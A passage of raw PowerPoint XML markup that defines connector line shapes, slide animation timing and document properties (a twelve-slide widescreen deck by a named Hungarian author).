        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BCA04F-2D3E-D39F-BB47-DCC857D74D85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4053840" y="3017520"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B221CE00-7540-81CC-B284-8F67DBDA0925}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3028061" y="3017520"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4B1348-66FB-4F63-04F7-9AFC74DAC143}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5076317" y="3015950"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="45" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3D6459-80E2-8A0B-050F-04525A5A764F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7124573" y="3015950"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="46" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC075B38-E477-D559-33B5-D7AB2D7642AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6100445" y="3015950"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="48" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{781C8725-2575-4239-9534-037D64C855BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="9172829" y="3010383"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="49" name="Egyenes összekötő 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15C4B7D5-971B-0909-22C1-2E0FB77B8126}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8148701" y="3010383"/>
              <a:ext cx="1689100" cy="1794210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>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52366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50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>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1306</TotalTime>
  <Words>575</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>99</Paragraphs>
  <Slides>12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12</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="17" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Consolas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Pflum Tamás József</dc:creator>
  <cp:lastModifiedBy>Pflum Tamás József</cp:lastModifiedBy>
  <cp:revision>274</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-30T19:12:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-20T19:15:56Z</dcterms:modified>
</cp:coreProperties>
</file>